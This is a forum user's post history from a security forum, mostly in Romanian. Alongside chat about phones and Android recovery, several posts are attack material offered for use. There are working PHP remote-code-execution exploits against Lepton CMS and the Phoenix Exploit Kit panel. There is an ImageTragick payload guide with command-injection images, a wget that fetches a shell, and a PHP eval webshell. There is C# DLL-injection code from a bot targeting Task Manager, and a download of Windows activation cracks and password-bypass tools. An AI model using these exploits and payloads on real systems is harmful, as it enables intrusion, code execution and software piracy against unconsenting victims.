Jump to content

Jako

Active Members
  • Posts

    68
  • Joined

  • Last visited

Posts posted by Jako

  1. On 9/10/2016 at 10:57 AM, XbPor said:

    Eu sunt fan samsung ... ( in prezent detin samsung note Edge , NOTE 4 )

    Am facut precomanda de iphone 7 .... Se merita mutarea?

    La precomanda il am inaintea vanzari oficiale in magazin ?

     

    http://www.gsmarena.com/nokia_lumia_930-6227.php

     

    La precomanda nu-l ai inainte. La precomanda, uneori, poti beneficia de un pret mai bun/reducere si iti asigura produsul in cazul stocurilor limitate sau in cazul produselor populare care se vand foarte repede.

  2. On 8/20/2016 at 10:08 PM, tds2 said:

    Salut,

     

    Cine poate oferi, doar valide, fara emailuri generate.

    Dau dedicate la schimb sau cere un pret.

     

    Mai bine nu-l mai contactezi pe unic, am vazut ca lumea se plange de serviciile oferite de catre el.

  3. On 7/15/2016 at 4:17 AM, MihaiIonut said:

    Voi incarca documentatiile aplicatiilor la voi pe forum si voi reveni saptamana viitoare si cu linkuri pentru videoclipurile private de pe YouTube cu demonstratiile - nu am avut timp sa le pun...

    Pana luna viitoare le voi posta si pe GitHub; acum lucrez la o aplicatie medicala (scrisa in Solidity) folosind technologia Blockchain (Ethereum +  DAO + smart contracts) si vreau sa o aduc la stadiul de prototip functional in curand...

     

    Weekend placut.

     

     

    Salut!

    Cainii latra, ursul trece...

  4. DLC Boot 2016 is a rescue disk that is used as a Recovery CD. The point is that if you are having problems such as Windows can not boot, missing MBR, want to format the hard drive, remove viruses and so on, you can simply use the DLC Boot 2016 to resolve these issue. DLC Boot 2016 is also able to backup / restore windows partition, create partitions, entering a locked Windows, and much more!

    * Integrated Mini Windows 10 32/64 bit
    * Integrated Mini Windows XP deducted from Hiren's version 15.2 and has been built, optimized again.

     

    DLC_Boot_2016_3_2_Build_160727_1.jpg

     

    DLC_Boot_2016_3_2_Build_160727_3.jpg

     

    TOOLS LIST:

    Spoiler

    1. DOS Tools:

    Backup Tools:
    Norton Ghost 11.5.1
    True Image Home 2016 19.6027

    Other Tools:
    Test LCD
    MemTest86
    Kon-Boot 2.4
    Active Password Changer Pro 5.0
    Offline XP/Vista/7 Password Changer

    Disk Tools:
    Acronis Disk Director Home 12.0.3270
    Partition Guru Pro
    HDD Regenerator 2011 12.11.2013
    MHDD 4.6
    HDAT2 4.5.3
    NTFS4Dos 1.9
    Smart Fdisk 2.05
    Disk Patch 4.0.300
    Samsung Quick Tool 1.9
    Norton Disk Doctor 2002
    Norton Disk Editor 2002
    Partition Magic Pro 8.05
    Ontrack Disk Manager 9.57
    Partition Table Doctor 3.5

    2. Mini Windows XP / 10 tools:

    Tools for Mini Windows:
    Add Fonts for Mini XP
    Set DLC1Temp
    Disable TeraCopy Pro 2.27
    Enable TeraCopy Pro 2.27
    Set PageFile
    ImDisk Virtual Disk Driver 1.9.1
    Clear Temp Folder

    Disk Tools:
    Partition Wizard Server Edition 9.1
    Aomei Partition Assistant Server 6.2
    Easeus Partition Master Unlimited 10.8
    Macrorit Disk Partition Expert 3.9.0
    Partition Guru Pro 4.8.0.256
    Active Kill Disk 10.0.0.6
    Crystal Disk Info 7.0.0
    Crystal Disk Mark 5.1.2
    Victoria 4.47
    HD Tune Pro 5.60
    BootICE 1.3.3.2
    Grub4Dos Setup
    HDD Low Level Format Tool 4.40
    Raid Reconstructor 4.40
    AOMEI NTFS to FAT32 Pro 2.0
    LinuxReader 2.3
    WinContig 2.0.0.2

    Backup:
    Acronis True Image Shell
    True Image Home 2014 17.6673
    True Image Home 2017 20.3031
    Ghost32 12.0.0.4112
    Miray HDClone Enterprise 6
    Active Disk Image 7.0.4
    Ghost Explorer 11.5.1.2266
    GhostCast Server 11.5.0.2113
    OneKey Ghost 14.5.8.215

    Drivers:
    Double Driver 4.1.0
    3DP Chip 16.06

    Network:
    Maxthon 4.9.3.1000
    Cent Browser 1.9.13.75
    Internet Download Manager 6.25.21
    TeamViewer 11.0.59518
    GetAlbumMP3 2016.01.0.6
    UltraSurf 15.04
    Fix Internet 4.0
    SoftPerfect Network Scanner 6.1.7
    TFtpd32
    DNS Jumper 2.0
    Remote Computer Manager Enterprise 6.0.9
    MyLanViewer 4.19.8
    Change MAC Address 2.8.0.95
    RealVNC Server 5.0.5
    RealVNC Viewer 5.0.5
    Wake Me On lan 1.76
    Free WiFi Hotspot 3.2.1.0
    Free WiFi Hotspot 4.0.1

    Recovery:
    R-Drive Image 6.0.6014
    GetDataBack Simple 2.01
    EASEUS Data Recovery Wizard Technician 9.9.0
    Ontrack EasyRecovery Pro 10.0.2.3
    MiniTool Power Data Recovery 7.0
    iCare Data Recovery Pro 5.0
    OO DiskRecovery Technician 11.0.17.0
    CardRecovery 6.10.1210
    Partition Find and Mount Pro 2.31
    Active Partition Recovery 14.0.1
    Active File Recovery 14.5.0
    7 Data Recovery Suite 3.7
    Hetman Partition Recovery 2.3
    Diskgetor Data Recovery 3.58
    MilfordSoft Data Recovery 4.0

    Hardware Tools:
    HWiNFO32 5.30.2880
    CPU-Z 1.76.0
    GPU-Z 0.8.9.0
    Devlib GetDiskSerial 5.00
    Hard Disk Serial Number Changer
    Hardware Monitor 1.28.0
    Video Memory Stress Test 1.7.116
    Is My LCD OK 2.72
    Passmark Keyboard Test 3.1.1000
    BatteryMon 2.1.1004
    Dead Pixel Tester 3.0
    Key Tweak 2.3.0

    Office:
    Office 2007
    Unikey 4.0 RC2
    SumatraPDF 3.1.1

    Antivirus:
    Eset NOD32 4.2.71.2
    Kaspersky TDSSKiller 3.1.0.9
    Remove Fake Antivirus 1.99
    Win32/Sality Remover 1.2.0.616
    Windows Worms Doors Cleaner 1.4.1
    BK Anti Macro Virus 3.1
    TN Anti virus macro 4 and names for Excel
    Windows Privacy Tweaker 2.0

    System:
    Total Uninstall Pro 6.16.0
    Revo Uninstaller Pro 3.1.5
    WinNTSetup 3.8.6
    Avast Registry Editor
    Defraggler Technician Edition 2.20.989
    Fix Printer
    Torchsoft Registry Workshop 5.0.0
    PowerTool 4.5
    Process Explorer 16.12
    Fix NTLDR is Missing
    NTBOOT AutoFix 2.6.0
    Install NET Frame Win 8/10 (Offline
    Active Load Hive
    DLLRegSVR 1.1
    The Ultimate PID Checker 1.1.3.590

    Utilities:
    Total Commander 8.52a Final
    7Zip 15.14
    CCleaner Technician Edition 5.15.5513
    File Splitter Joiner 3.3
    RAR Repair Tool 4.0.1
    Resource Hacker 4.2.5
    Turn Off Monitor 1.0
    Blank And Secure 4.14
    On Screen Keyboard
    Mouse Emulator
    UltraISO Premium 9.6.5.3237
    BurnAware Professional 8.9
    Nuclear Coffee Recover Keys 9.0.3.168
    Duplicate File Finder 3.5.0.0
    VLC Media Player 2.2.2
    Free MP3 Cutter Joiner 10.7
    RenameFile 11.4
    SmartRipper 2.41
    Check File Hash 1.0

    USB Tools:
    USB Disk Storage Format
    USB Unhide 1.0
    Test USB 1.4
    Rufus 2.7.855
    Flash Memory Toolkit 2.00
    SD Formatter 4.0
    NTFS Drive Protection 1.4

    Password Tools:
    Anti Deep Freeze 0.1
    Anti Deep Freeze 0.4
    CMOS DeAnimator 3.0
    Active Password Changer Pro 7.0.9
    Daossoft Windows Password
    Tenorshare Windows Password 6.1
    Admin Password Resetter
    WebBrowser Password Viewer 1.70
    PDF Password Remover 3.12
    Get Password 1.0
    Windows Gate 1.1
    Nuclear Coffee Recover Passwords 1.0.0.26

    Crack your Windows:
    Remove WGA 1.2
    RemoveWAT 2.2.6
    Windows 7 Loader 2.2.2
    HEU KMS Activator 10.0.0
    Re-Loader Activator 2.2

     

    Download:

    https://docs.google.com/uc?id=0BxTOYa030FZmcDNvOTNhWFU3c00&export=download

    • Upvote 4
  5. 19 hours ago, Individual14xxx said:

    Salut! Mi-am amintit ca am un oneplus one spart , l-am primit de la un prieten care i-a dat factory reset dupa ce si-a distrus display-ul. Telefonul e blocat in welcome screen , butoanele sunt functionale deci pot intra in recovery mode. Nu sunt deloc familiarizat cu android, habarnam cum pot instala android de pe pc cu un usb cable . Am incercat sa copiez "twrp-2.8.6.0-bacon.img" (nu stiu daca e ce trebuie) de pe pc in internal storage-ul telefonului via usb dar nimic , in win explorer mi-a aparut ca e acolo but for some reason telefonul nu vede acel img. Cineva binedispus sa ma ajute cu un sfat , tutorial , anything?

    Sper ca m-am exprimat cat de cat bine , multumesc.

     

    Din Recovery menu:

    Wipe cache partition

    Wipe data/factory reset

    Inchide telefonul - shutdown

    Scoate bateria pentru 30 de minute si lasa-l asa

    Reporneste-l

    Daca nu merge o sa te ajut eu. Vorbim pe chat sau prin pm.

  6. 13 hours ago, 006julieno said:

    Bugetul este ok, dar nu ar merita sa platesc 200 euro lunar pentru o protectie ddos si 20 euro un vps, din cauza unoi copii care se joaca cu ddos .

    Baiatu de la tni.ro are o protectie buna la dedicate si nu au probleme cu flood doar ca m-am certat cu el si nu mai pot achizitiona nimic de acolo .

     

    @ La gazduire.com.ro mi-au suspendat vps-ul ca primea un atack prea puternic si nu-l puteau oprii si ii afecta multe servere .

     

    Am sa iau de la ovh sa vedem ce este de capul lor .

     

    https://dataflow.su

    • Downvote 1
  7. <?php
    
    /*
    Lepton CMS v2.2.2 - Remote Code Execution
    Dork: intext:"Design by CMS-LAB"
    */
    
    $target = "http://127.0.0.1/lepton/install/save.php";
    $payload = "');?><?php echo '<pre>'; system(\$_GET['cmd']); die();?>";
    
    function curl_post($url, $post_data) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_POST, 15);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
            $output = curl_exec($ch);
            $info = curl_getinfo($ch);
            curl_close($ch);
            return $info;
    }
    
    $da = curl_post($target, "guid=E610A7F2-5E4A-4571-9391-C947152FDFB0&website_title=abc&lepton_url=a&default_timezone_string=Europe/London&default_language=EN&operating_system=linux&database_host=$payload&database_username=root&database_password=abc&database_name=test&table_prefix=abc_&admin_username=admin&admin_email=admin@admin.com&admin_password=admin&admin_repassword=admin");
    if($da['http_code'] == 200) {
            echo "\nTada: Now visit /config.php?cmd= on target.\n";
    }
    
    ?>

     

  8. Stiu ca s-a mai discutat pe forum despre asta, dar poate cuiva ii sunt folositoare informatiile.

     

    Should work for all image files (.jpg/.mvg/.svg/.png/etc.)

     

    Exploit Image contents:

    Spoiler

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|YOUR COMMAND HERE")'

     

    Example Image:

    Spoiler

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|cat /etc/passwd")'
    pop graphic-context

     

    More examples:

    Spoiler

    Example #1:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|cat /etc/passwd")'
    pop graphic-context

     

    Example #2:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|ls -la")'
    pop graphic-context

     

    Example #3:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|wget -O shell.php http://site.com/shell.txt")'
    pop graphic-context

     

    HOW TO:

    1. Find an Image uploader that uses ImageMagick to process images.
    (Try it @ http://attack32.samsclass.info/im.htm)
    2. Craft a malicious image file
    3. If it is running a vulnerable version, you'll have full RCE!

     

    TRICKS:

    1. It's possible to read arbitrary files from a web server by uploading an ImageMagick Vector Graphics file (MVG) that the web application processes with ImageMagick:

    Spoiler

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:@/etc/passwd'
    pop graphic-context

     

    As is the case with all of these vulnerabilities, the file doesn't need to be uploaded with a .mvg extension. You can change it to .png, .jpg, or anything else.

    If the file doesn't exist, you'll see the @ symbol plus the filename as the output.

     

    2. You can use a similar technique to delete a file, provided ImageMagick is built with support for it's ephemeral protocol:

    Spoiler

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'ephemeral:/var/www/index.php'
    pop graphic-context

     

    3. You can move files around, provided you're able to determine the location of uploaded files. This can be used to upload new files as well as overwrite existing files.

    first_image.png:

    Spoiler

    <?xml version="1.0" encoding="UTF-8"?>
    <image>
    <read filename="/var/www/uploads/second_image.png"/>
    <write filename="/var/www/hi.php"/>
    </image>

     

    second_image.png:

    Spoiler

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
    pop graphic-context

     

    third_image.png:

    Spoiler

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
    pop graphic-context

     

    Additional info can be read here.

     

     

    HAVE FUN!

  9. import argparse
    import validators
    
    def get_gate(f):
       gate = ''
       pe = f.read()
       print len(pe)
       if len(pe) >= 63000 and len(pe) <= 100000:
           i = pe.find('YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0') - 3
    
           if i > 0:
               while pe[i] != '\x00' and i >= 0:
                   gate = pe[i] + gate
                   i   -= 1
    
       return gate
    
    parser = argparse.ArgumentParser(description='Extract Pony binary gate.')
    parser.add_argument('FILE', type=argparse.FileType('rb'), help='Pony binary')
    args = parser.parse_args()
    
    gate = get_gate(args.FILE)
    
    if validators.url(gate):
       print gate
    else:
    print 'Gate not found!'

    VB6 version:

    https://github.com/Xyl2k/Pony-gate-extractor

     

    demo:

    http://cybercrime-tracker.net/ccpm.php

    • Upvote 2
  10. 3 minutes ago, Andrei said:

    @Jako Nu, din contra, it security e un domeniu care trebuie inteles (macar in linii mari) tocmai de cei care activeaza in afara domeniului. Iti recomand sa arunci o privire peste prezentarile din anii precedenti pentru a-ti face o idee de nivelul prezentarilor (http://def.camp/archives/) la care se adauga activitatile si concursurile ce se desfasoara in paralel cu concursul. 

     

    O sa ma uit, multumesc frumos!

  11. #!/usr/bin/env ruby
    require "base64"
    File.open('lista.txt', 'r') do |f1|                
     while line = f1.gets  
           val= line.split(":")
           b64decode=Base64.decode64(val[1])
           printf "%s%s%s\n",val[0],":",b64decode
     end  
    end

    in loc de lista.txt introdu numele listei tale.

  12. 13 hours ago, Cosminovici said:

    Stiu ca securitatea de pe TOR nu este 100% si de aceea am nevoie de VPN ca sa maschez IP-ul.

     

    NoScript -> Forbid scripts globally, fara plug-ins cum a spus si wildchild mai sus. Poti sa folosesti Tortilla si o masina virtuala.

    http://download.crowdstrike.com/tortilla/Tortilla_v1.1.0_Beta.zip

    https://github.com/CrowdStrike/Tortilla

    Pe main OS instalezi Tortilla, rulezi masina virtuala si apoi in masina virtuala setezi sa foloseasca doar conexiunea creata de Tortilla.

    • Thanks 1
  13. <?php
    /*
    #
    # Phoenix Exploit Kit
    # 	- Remote Code Execution
    #	: /includes/geoip.php
    */
    
    $site = "http://127.0.0.1/phoenix/";
    $target = "includes/geoip.php?bdr=";
    $payload = "passthru('uname -a')";
    
    function curl_get($url) {
    	$ch = curl_init();
    	curl_setopt($ch, CURLOPT_URL, $url);
    	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
    	$output = curl_exec($ch);
    	curl_close($ch);
    	return $output;
    }
    
    echo curl_get($site.$target.$payload);
    
    ?>

     

    • Upvote 1
  14. Spoiler

    <?php
    error_reporting(0);
    function create_htaccess()
    {
        $content =  "order deny,allow\ndeny from all";

        if (!$file = fopen('database/.htaccess', 'w')) {
            echo 'Cannot create .htaccess-file';
            exit;
        }

        if (!fwrite($file, $content)) {
            echo 'Cannot write into .htaccess-file';
                exit;
            }

        fclose($file);
    }

    error_reporting(E_ALL);
    ini_set('display_errors',0);

    $filename = $_SERVER['SCRIPT_NAME'];

    /* create SQLITE3-database */
    class MyDB extends SQLite3
    {
        function __construct()
        {
        if (!file_exists('database/reqests.sqlite3')) {
            mkdir('database', 0700) or die('Cannot create folder "database"');
            create_htaccess();
                $this->open('database/reqests.sqlite3', SQLITE3_OPEN_READWRITE|SQLITE3_OPEN_CREATE);
            $this->exec('CREATE TABLE data (access_key char(32), content varchar(1048576), ip varchar(1048576))');
            //the database shouldn't be accessed by everyone
            chmod("database/database.sqlite3", 0600) or die('Cannot set access rights for database.sqlite3 (chmod 0600)');
        } else {
            //if it is the case, that you move the database file manually to the folder
            chmod('database', 0700) or die('Cannot set access rights for "database"-folder (chmod 0700)');
            chmod("database/database.sqlite3", 0600) or die('Cannot set access rights for "database.sqlite3"-file (chmod 0600)');
                $this->open('database/reqests.sqlite3', SQLITE3_OPEN_READWRITE);
        }
        }
    }

    $db = new MyDB();

    if (isset($_POST['text'])) {
        //insert content to database

        $bytes = openssl_random_pseudo_bytes(16, $cstrong);
        $access_key = bin2hex($bytes);
        $content = $db->escapestring($_POST['text']);
        $db->exec("INSERT INTO data (access_key, content) VALUES ('$access_key', '$content',$user_get)");

        $protocol = (isset($_SERVER['HTTPS'])) ? 'https' : http;

        $body = "<br>Your <b>note</b> can be accessed here:<br><br>
            <b>
            <textarea>
    http://195.3.144.88/note.php?akey=$access_key
            </textarea></b>";
    } else if (isset($_GET['akey'])) {
        //access note if possible

        $result = $db->query('SELECT content FROM data WHERE access_key =\''.$db->escapestring($_GET['akey']).'\'');
        $body = $result->fetchArray(SQLITE3_ASSOC);
        $body = '<pre>'.htmlspecialchars($body['content']).'</pre>';
        unlink('database/database.sqlite3');
        unlink('database/.htaccess');
        rmdir('database');
    } else {
        $body = "<br><form action=\"$filename\"".' method="post">
        <textarea style="" name="text" rows="4" cols="110"></textarea><br>
        <input style="" type="submit" value="post" />
        </form>';
    }



    /* HTML DATA TOP */
        echo <<<END
    <!doctype html>
    <html>

        <style type="text/css">
    hr:before, hr:after {
    position: absolute;
    content: '';
    height: 1em;
    top: 0;
    left: 0;
    right: 0;
    }
        
    hr:before {
    background: linear-gradient(90deg, #1abc9c 15%, #2ecc71 15%, #2ecc71 12%, #3498db 12%, #3498db 32%, #9b59b6 32%, #9b59b6 35%, #34495e 35%, #34495e 55%, #f1c40f 55%, #f1c40f 59%, #e67e22 59%, #e67e22 63%, #e74c3c 63%, #e74c3c 82%, #ecf0f1 82%, #ecf0f1 92%, #95a5a6 92%);
                                }
                                .navbar-x {
                                text-align: center; }
                                .navbar-x .nav {
                                position: relative;
                                overflow: hidden;
                                display: inline-block; }
                                .navbar-x .nav:hover.nav-pills > li.active > a, .navbar-x .nav:focus.nav-pills > li.active > a {
                                color: #eeeeee; }
                                .navbar-x .nav:hover.nav-pills > li.active > a:hover, .navbar-x .nav:hover.nav-pills > li.active > a:focus, .navbar-x .nav:focus.nav-pills > li.active > a:hover, .navbar-x .nav:focus.nav-pills > li.active > a:focus {
                                color: black;
                                background-color: inherit; }
                                .navbar-x .nav > li > a {
                                width: 104px;
                                color: #eeeeee;
                                transition: color 0.42s ease-in-out; }
                                .navbar-x .nav > li > a:hover, .navbar-x .nav > li > a:focus {
                                color: black;
                                background-color: inherit; }
                                .navbar-x .nav > li.active > a {
                                color: black;
                                background-color: inherit; }
                                .navbar-x .nav > li.bottom-bar {
                                transition: left 0.42s ease-in-out;
                                position: absolute;
                                height: 3px;
                                width: 104px;
                                bottom: 0;
                                background-color: ; }
                                .navbar-x .nav > li:nth-child(1).active ~ .bottom-bar {
                                left: 0px; }
                                .navbar-x .nav > li:nth-child(1):hover ~ .bottom-bar, .navbar-x .nav > li:nth-child(1):focus ~ .bottom-bar {
                                left: 0px !important; }
                                .navbar-x .nav > li:nth-child(2).active ~ .bottom-bar {
                                left: 100px; }
                                .navbar-x .nav > li:nth-child(2):hover ~ .bottom-bar, .navbar-x .nav > li:nth-child(2):focus ~ .bottom-bar {
                                left: 100px !important; }
                                .navbar-x .nav > li:nth-child(3).active ~ .bottom-bar {
                                left: 200px; }
                                .navbar-x .nav > li:nth-child(3):hover ~ .bottom-bar, .navbar-x .nav > li:nth-child(3):focus ~ .bottom-bar {
                                left: 200px !important; }
                                .navbar-x .nav > li:nth-child(4).active ~ .bottom-bar {
                                left: 300px; }
                                .navbar-x .nav > li:nth-child(4):hover ~ .bottom-bar, .navbar-x .nav > li:nth-child(4):focus ~ .bottom-bar {
                                left: 300px !important; }
                                .navbar-x .nav > li:nth-child(5).active ~ .bottom-bar {
                                left: 400px; }
                                .navbar-x .nav > li:nth-child(5):hover ~ .bottom-bar, .navbar-x .nav > li:nth-child(5):focus ~ .bottom-bar {
                                left: 400px !important; }
                                @import url("http://fonts.googleapis.com/css?family=Raleway");
                                html {
                                font-size: 16px;
                                }
                                body {
                                margin: 0;
                                font-family: Raleway;
                                }
                                ul {
                                margin: 2rem auto;
                                width: 600px;
                                }
                                ul li {
                                display: flex;
                                flex-direction: row;
                                padding: 0.5em;
                                list-style: none;
                                }
                                ul li .content {
                                flex: 1;
                                padding: 0.5em;
                                }
                                ul li [type=text] {
                                flex: 1;
                                margin-right: 1em;
                                padding: 0.1em;
                                border: 1px solid #ccc;
                                font-size: 1em;
                                }
                                ul li .checkbox [type=checkbox] {
                                display: none;
                                }
                                ul li .checkbox label {
                                display: block;
                                position: relative;
                                width: 30px;
                                height: 30px;
                                background-color: #27ae60;
                                border-radius: 50%;
                                }
                                ul li .checkbox label:before {
                                content: ' ';
                                display: block;
                                position: absolute;
                                left: 0;
                                top: 0;
                                right: 0;
                                bottom: 0;
                                background-color: #fff;
                                border-radius: 50%;
                                transform: scale(0.8);
                                transition: 0.1s;
                                }
                                ul li .checkbox [type=checkbox]:checked ~ label:before {
                                transform: scale(0.2);
                                }
                                ul li .button button {
                                display: block;
                                position: relative;
                                width: 30px;
                                height: 30px;
                                background-color: #2980b9;
                                border: none;
                                border-radius: 50%;
                                }
                                ul li .button button:before {
                                content: ' ';
                                display: block;
                                position: absolute;
                                left: 12px;
                                top: 7px;
                                border-width: 8px;
                                border-style: solid;
                                border-color: transparent transparent transparent #fff;
                                }
                                ul li:first-child {
                                margin-bottom: 1em;
                                }
                                h1 {
                                position: relative;
                                margin: 2rem 3em;
                                padding: 0.5em;
                                background-color: #e85041;
                                text-align: center;
                                color: #fff;
                                line-height: 1em;
                                }
                                h1:before,
                                h1:after {
                                content: ' ';
                                display: block;
                                position: absolute;
                                top: 0;
                                width: 0;
                                height: 0;
                                border-width: 1em;
                                border-style: solid;
                                border-color: #e85041 transparent;
                                }
                                h1:before {
                                left: -1em;
                                }
                                h1:after {
                                right: -1em;
                                }
                                container {
                                padding-right: 0;
                                padding-left: 25px;
                                margin-right: auto;
                                margin-left: auto;
                                }
            .code_sample {
        border: 1px solid #DADADA;
    font-size: 12px;
    margin-bottom: 10px;
    margin-top: 10px;
    }
            html {height: 100%; width: 100%;}
            body {padding:0 1%; width:98%; height:90%;}
            h1 {width:100%; height:3%}
            form {width:100%; height:90%;}
            textarea {border:1px dashed black; width: 60%; height:10%; padding: 1%;}
            input {margin-top:1px; border: 1px solid black;}
        </style>
    </head>
    <body>
                                
                                <hr />
                                <!-- getbootstrap -->
                                <link href="http://getbootstrap.com/dist/css/bootstrap.css" rel="stylesheet" type="text/css" />
                                <!-- /getbootstrap -->
                                
                                
                                <div class="navbar-x">
                                <div class="container">
                                <ul class="nav nav-pills">
                                <li><a href="#">Home</a></li><li><a href="note.php">Notes</a></li><li class="active"><a href="search.php">Search</a></li><li><a href="#">History</a></li><li><a href="index.php">Logout</a></li><li class="bottom-bar"></li>
                                </ul>
                                </div>
                                </div>
                                


    <ul>
    <li><font color="black">Create a note and get a link.</font></li><br>
    <li><font color="black">Copy the link and send it to whom you want to read the note.</font><br><br>
    <li><font color="black">The note will self-destruct after being read.</font><br><br>

    </ul>

    </ul>
    <br><center>
    $body     
    </html>

    END;

    /* HTML DATA END */

    ?>

     

  15. using System;
    using System.Collections.Generic;
    using System.Text;
    using System.Threading;
    using System.Runtime.InteropServices;
    using System.Diagnostics;
    using System.IO;
    using System.Reflection;
    
    namespace alphabotcsharp
    {
        public class Injection
        {
            [DllImport("kernel32.dll")]
            public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    
            [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
            public static extern IntPtr GetModuleHandle(string lpModuleName);
    
            [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
            static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    
            [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
            static extern IntPtr VirtualAllocEx(IntPtr hProcess,
                IntPtr lpAddress,
                uint dwSize,
                uint flAllocationType,
                uint flProtect);
    
            [DllImport("kernel32.dll", SetLastError = true)]
            static extern bool WriteProcessMemory(IntPtr hProcess,
                IntPtr lpBaseAddress,
                byte[] lpBuffer,
                uint nSize,
                out UIntPtr lpNumberOfBytesWritten);
    
            [DllImport("kernel32.dll")]
            static extern IntPtr CreateRemoteThread(IntPtr hProcess,
                IntPtr lpThreadAttributes,
                uint dwStackSize,
                IntPtr lpStartAddress,
                IntPtr lpParameter,
                uint dwCreationFlags,
                IntPtr lpThreadId);
    
            // privileges
            const int PROCESS_CREATE_THREAD = 0x0002;
            const int PROCESS_QUERY_INFORMATION = 0x0400;
            const int PROCESS_VM_OPERATION = 0x0008;
            const int PROCESS_VM_WRITE = 0x0020;
            const int PROCESS_VM_READ = 0x0010;
    
            // used for memory allocation
            const uint MEM_COMMIT = 0x00001000;
            const uint MEM_RESERVE = 0x00002000;
            const uint PAGE_READWRITE = 4;
    
            public static bool isInjected = false;
            [DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.Winapi)]
            [return: MarshalAs(UnmanagedType.Bool)]
            private static extern bool IsWow64Process(
                [In] IntPtr hProcess,
                [Out] out bool wow64Process
            );
    
            static bool is64BitProcess = (IntPtr.Size == 8);
            static bool is64BitOperatingSystem = is64BitProcess || InternalCheckIsWow64();
    
            public static int inject(string dllPath, Process tProcess)
            {
                Process targetProcess = tProcess;
                string dllName = dllPath;
    
                // the target process
                // geting the handle of the process - with required privileges
                IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
                // searching for the address of LoadLibraryA and storing it in a pointer
                IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
                // name of the dll we want to inject
                // alocating some memory on the target process - enough to store the name of the dll
                // and storing its address in a pointer
                IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                // writing the name of the dll there
                UIntPtr bytesWritten;
                WriteProcessMemory(procHandle, allocMemAddress, Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
                // creating a thread that will call LoadLibraryA with allocMemAddress as argument
                CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero);
                return 0;
            }
    
            public static void Execute()
            {
                string rawDLL = String.Empty;
                if(is64BitOperatingSystem)
                {
                    rawDLL = Path.Combine(Path.GetDirectoryName(Assembly.GetEntryAssembly().Location), "h64.dll");
                }
                else
                {
                    rawDLL = Path.Combine(Path.GetDirectoryName(Assembly.GetEntryAssembly().Location), "h32.dll");
                }
                // Execution of injection
                Process proc = Process.GetProcessesByName("taskmgr")[0];
                Injection.inject(rawDLL, proc);
                isInjected = true;
            }
            public static Boolean isInjectedAlready()
            {
                if(isInjected)
                {
                    return true;
                }
                else
                {
                    return false;
                }
            }
            public static bool InternalCheckIsWow64()
            {
                if ((Environment.OSVersion.Version.Major == 5 && Environment.OSVersion.Version.Minor >= 1) ||
                    Environment.OSVersion.Version.Major >= 6)
                {
                    using (Process p = Process.GetCurrentProcess())
                    {
                        bool retVal;
                        if (!IsWow64Process(p.Handle, out retVal))
                        {
                            return false;
                        }
                        return retVal;
                    }
                }
                else
                {
                    return false;
                }
            }
        }
    }

     

    • Upvote 1
×
×
  • Create New...